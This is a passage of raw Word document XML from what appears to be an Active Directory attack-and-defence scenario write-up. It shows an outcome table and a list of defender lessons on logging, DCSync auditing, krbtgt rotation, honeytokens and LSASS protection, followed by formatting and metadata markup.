        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09D43D02" w14:textId="4B1079FD" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t xml:space="preserve"> Incomplete certificate export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1344522C" w14:textId="48E85E82" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅Blocked DNS tunneling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6E70" w14:paraId="13807273" w14:textId="3F111F5A" w:rsidTr="00CE6E70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67A77D82" w14:textId="201BD3D0" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r>
              <w:t>Final Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F86DAB1" w14:textId="0CE2C5F9" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>EVICTED</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE6E70">
              <w:t xml:space="preserve"> — infrastructure burned, no remaining access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2732" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EEC9079" w14:textId="6184E9BA" w:rsidR="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="007B3505">
            <w:r w:rsidRPr="00CE6E70">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>VICTORY</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE6E70">
              <w:t xml:space="preserve"> — but costly, exhausting, and narrowly won</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FC56C2A" w14:textId="77777777" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505"/>
    <w:p w14:paraId="19B0B47C" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KEY LESSONS FOR DEFENDERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08B464" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enable logging BEFORE you need it.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t xml:space="preserve"> Event ID 4662, 4768, 4769, and 5136 are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-negotiable on DCs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FD34C7" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit DCSync permissions quarterly.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t xml:space="preserve"> Any account with Replicating Directory Changes is a potential domain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE5E9B" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Rotate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> twice a year.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t xml:space="preserve"> And test that rotation in a lab first — know what breaks before production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E02F82" w14:textId="56E45070" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deceptive security decoy mechanisms like tarpits, and honeytokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t xml:space="preserve"> They're cheap, high-fidelity, and catch attackers when nothing else will.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B67D7" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitor for phantom users.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t xml:space="preserve"> Real users exist in AD. Forged Golden Ticket users don't.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1B863D" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protect LSASS.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t xml:space="preserve"> Credential Guard, LSA protection, and EDR behavioral monitoring are essential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F9918C" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rotate cloud federation certificates.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t xml:space="preserve"> The cloud is just another domain controller. Treat it accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11519B54" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assume breach.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:t xml:space="preserve"> The attacker will get in. The question is whether you can detect, contain, and evict them before they achieve their objective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C09579" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00000000" w:rsidP="00CE6E70">
      <w:r>
        <w:pict w14:anchorId="61C33AB9">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31330006" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70">
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The defender won this round. But the war never ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C94C173" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="00CE6E70" w:rsidRDefault="00CE6E70" w:rsidP="00CE6E70"/>
    <w:p w14:paraId="3E67280A" w14:textId="77777777" w:rsidR="00CE6E70" w:rsidRPr="007B3505" w:rsidRDefault="00CE6E70" w:rsidP="007B3505"/>
    <w:p w14:paraId="23556BA9" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505"/>
    <w:p w14:paraId="1211C395" w14:textId="16CB17C4" w:rsidR="007B3505" w:rsidRPr="00910E27" w:rsidRDefault="007B3505" w:rsidP="00910E27"/>
    <w:sectPr w:rsidR="007B3505" w:rsidRPr="00910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V Boli">
    <w:panose1 w:val="02000500030200090000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000100" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Random Wednesday">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="80000027" w:usb1="00000002" w:usb2="00000000" w:usb3="00000000" w:csb0="00000003" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Numaos">
    <w:panose1 w:val="02000500000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:notTrueType/>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333"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="851C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D0002"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2AA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B5812"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F046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92321"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38382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50050"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD56EDFC"/>
    <w:lvl w:ilvl="0" w:tplc="74B0010E">
      <w:start w:val="1"/>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C1B2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B46C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A82257"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B8AE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D1577C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECE8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F659DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E920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5339AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="215E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943EA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="292E55D0"/>
    <w:lvl w:ilvl="0" w:tplc="02CA430A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="750" w:hanging="39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EA7FCA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="629A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904D17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E1A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6C2D14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CC4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4D0FE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2398F090"/>
    <w:lvl w:ilvl="0" w:tplc="54A6BD3C">
      <w:start w:val="1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7559C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD60F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4B7A8E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6629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586E00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0A64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E32637"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A03C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A349CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8748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B55E2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D88A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824D44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1E0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9317267">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1350452135">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="218522075">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="345251879">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="302319135">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="375392356">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="97066952">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="662242471">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1601180874">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="270668735">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="480930872">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="899243672">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2094082003">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="899555760">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="624772776">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1052462692">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1601135763">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="620771311">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="293558152">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="431514160">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1542329196">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="15625158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894"/>
    <w:rsid w:val="000D0F3B"/>
    <w:rsid w:val="0011171E"/>
    <w:rsid w:val="0015466A"/>
    <w:rsid w:val="00171605"/>
    <w:rsid w:val="001C3C09"/>
    <w:rsid w:val="001D00C0"/>
    <w:rsid w:val="00216AB6"/>
    <w:rsid w:val="00247E63"/>
    <w:rsid w:val="00315570"/>
    <w:rsid w:val="00386FD5"/>
    <w:rsid w:val="004068EE"/>
    <w:rsid w:val="00413F41"/>
    <w:rsid w:val="00420894"/>
    <w:rsid w:val="00422179"/>
    <w:rsid w:val="00432D45"/>
    <w:rsid w:val="00510158"/>
    <w:rsid w:val="00572585"/>
    <w:rsid w:val="00592855"/>
    <w:rsid w:val="005B57F3"/>
    <w:rsid w:val="00696B3A"/>
    <w:rsid w:val="007B3505"/>
    <w:rsid w:val="008416D5"/>
    <w:rsid w:val="008469C1"/>
    <w:rsid w:val="00853A1F"/>
    <w:rsid w:val="00910E27"/>
    <w:rsid w:val="00941DF8"/>
    <w:rsid w:val="00A40F32"/>
    <w:rsid w:val="00A435E7"/>
    <w:rsid w:val="00A557F6"/>
    <w:rsid w:val="00AB64D5"/>
    <w:rsid w:val="00B47558"/>
    <w:rsid w:val="00C04309"/>
    <w:rsid w:val="00C36D2B"/>
    <w:rsid w:val="00C72B94"/>
    <w:rsid w:val="00CE6E70"/>
    <w:rsid w:val="00D83477"/>
    <w:rsid w:val="00DE6295"/>
    <w:rsid w:val="00E525CB"/>
    <w:rsid w:val="00F54F43"/>
    <w:rsid w:val="00FE1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E9E3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C737F07A-50F0-46FA-845A-659DE862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894"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00420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894"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00420894"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00420894"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00420894"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00420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894"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00420894"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007B3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0F32"/>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2380">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2103257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9F8D237-9E2C-4105-AA7B-4B1BAED21112}">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0783A8C-2E4F-4A3F-8043-5113EDD8E49D}">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414</TotalTime>
  <Pages>36</Pages>
  <Words>11246</Words>
  <Characters>64103</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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-05T20:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-06T15:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>